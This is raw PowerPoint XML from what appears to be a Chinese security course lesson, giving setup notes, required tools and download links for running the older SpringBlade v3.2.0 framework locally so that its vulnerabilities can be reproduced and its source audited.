Target="../media/image121.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide145.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide151.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide146.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image134.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide152.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide147.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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23.emf"/><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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://v2.cn.vuejs.org/" TargetMode="Externa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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.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34.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hyperlink" Target="https://www.axios-http.cn/" TargetMode="Externa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hyperlink" Target="https://maven.apache.org/" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spring.io/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.spring.io/spring/docs/5.2.0.RELEASE/spring-framework-reference/web.html#spring-web" TargetMode="Externa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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId1"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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId1"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64.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3.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag37.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId1"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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag41.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag40.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83.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag43.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag42.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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag45.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4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image" Target="../media/image7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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.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image" Target="../media/image8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3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId1"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idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702425" y="3004820"/>
            <a:ext cx="4706620" cy="1316990"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring-Blade</a:t>
            </a:r>
            <a:r>
              <a:t>框架</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sym typeface="+mn-ea"/>
              </a:rPr>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990600" y="2372285"/>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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28"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HTML</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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搭建环境</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>须知</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67310" y="1126490"/>
            <a:ext cx="11509375" cy="5187950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由于本节课的目的是为了本地复现漏洞并且从代码审计的角度来分析源码，所以我们只需要复现萎缩版本的就可以，保证项目中最基本的服务能够正常启动系统能正常运行即可。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>为了成功复现框架中的一些漏洞我们挑选的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>版本是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>并不是用的最新版！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目中的技术栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NodeJS10.16.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Springboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Springcloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SrpingCloudAlibaba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Nacos Alibaba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Mybatis Plus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所需要的环境以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中间件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mysql 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JDK&gt;=8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>NodeJS &gt;=10.16.2;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>redis;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Nacos&gt;=2.x;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>maven;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>python27;</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前端工程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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目前分为三个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、Sword框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于react 、ant design、dva、umi的技术栈来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://gitee.com/smallc/Sword</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、Saber框架版：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>本节课基于该前端框架进行搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SpringBlade前端UI项目，对现有的vue、element-ui库进行二次封装。基于json驱动的模块配置，打造最好用的vuejs中后台脚手架，基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>vue2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://gitee.com/smallc/Saber</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、Saber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架版：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>相比与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Saber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Saber3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Vue3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://gitee.com/smallc/Saber/tree/3.x/</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后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>工程介绍</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blade-tool：后端架构核心工具包用于支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版的基础功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模块，、</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://gitee.com/smallc/blade-tool</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也称单机版，比较简单，但是在业务量大的场景化显得很臃肿，适用于业务比较简单固定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>场景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也称微服务版，由于对服务进行了拆分所以相对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版较为复杂，对开发和运维人员的能力要求也比较高，业务复杂多变场景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>本节课既搭建了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>SpringBoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>版又搭建了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>版。但是漏洞还是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>SpringCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>版中，在实际的项目中还是微服务版本用的比较多。</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搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>过程</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417820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>项目地址：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://github.com/chillzhuang/SpringBlade/releases/tag/v3.2.0</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所以我们要下载SpringBlade-3.2.0-boot.zip、SpringBlade-3.2.0.zip、Saber-3.2.0.zip三个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>相关手册：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBlade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭建手册：https://www.kancloud.cn/smallchill/blade/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Saber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>开发搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>手册：https://www.kancloud.cn/smallchill/saber</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Sword开发搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>手册：https://www.kancloud.cn/smallchill/sword</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>公开课：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://space.bilibili.com/525525</a:t>
            </a:r>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144780" y="1776095"/>
            <a:ext cx="7581265" cy="1987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搭建过程</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我本机已经搭建完毕，我把本机的搭建过程以图文的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>形式详细记录到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>markdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于大家的基础参差不齐为了减少搭建时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>错误所以我已经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>给到大家的文件包括：</a:t>
            </a:r>
